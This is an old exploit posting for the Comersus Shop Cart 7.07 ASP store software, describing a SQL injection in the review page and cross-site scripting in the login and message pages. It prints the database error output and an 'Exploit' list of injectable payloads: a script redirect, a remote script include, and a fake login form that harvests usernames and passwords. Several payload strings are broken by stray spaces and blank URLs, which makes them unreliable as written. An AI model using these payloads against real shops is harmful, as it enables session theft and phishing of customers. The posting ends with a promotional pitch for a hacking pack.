Comersus Shop Cart 7.07 SQL Injection & XSS

Credit: DoZ
Risk: Medium
Local: No
Remote: Yes

---> Comersus Shop Cart 7.07 SQL Injection & XSS Comersus is an active server pages (asp) software for running shopping stores, integrated with the rest of your web site. Comersus ASP Cart is free and IT CAN BE used for commercial purposes. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Hackers Center Security Group ( Credit: Doz Remote: YES Class: Cross Site Scripting Vendor: Product Tested: Comersus Cart 7.07 * Previous versions are also affected & so might 7.08! Attackers can exploit these issues via a web client. SQL Hole: /store/comersus_optReviewReadExec.asp?idProduct=' ------------------------------------------------------------ Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'idProduct=''. /demo707/includes/databaseFunctions.asp, line 38 ------------------------------------------------------------ Cross Site Scripting Pages: /comersus_customerAuthenticateForm.asp /comersus_message.asp Exploit: 1. path/store/comersus_customerAuthenticateForm.asp?redirectUrl=comersus_cu stomerS howOrders.asp/XSS or /path/store/comersus_customerAuthenticateForm.asp?redirectUrl=comersus_c ustomer ShowOrders.asp=XSS 2. Posible Cross Site Scripting Exploits 1. Trojan or Worms! directU rl="><script>window.location=""</scri pt> 2. Any Remote Script!<script src=></script> 3. Phishing!<form%20acti on="htt p://"%20method="post">Username:<input%20 name="u sername"%20type="text"%20maxlength="10"><br>Password:<input%20name="pass word"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"% 20value ="Login"></form> Pic: Only becoming a hacker you can stop a hacker. Were can you learn with out having to pay thousands!- - The most comprehensive security pack you will ever find on the net!

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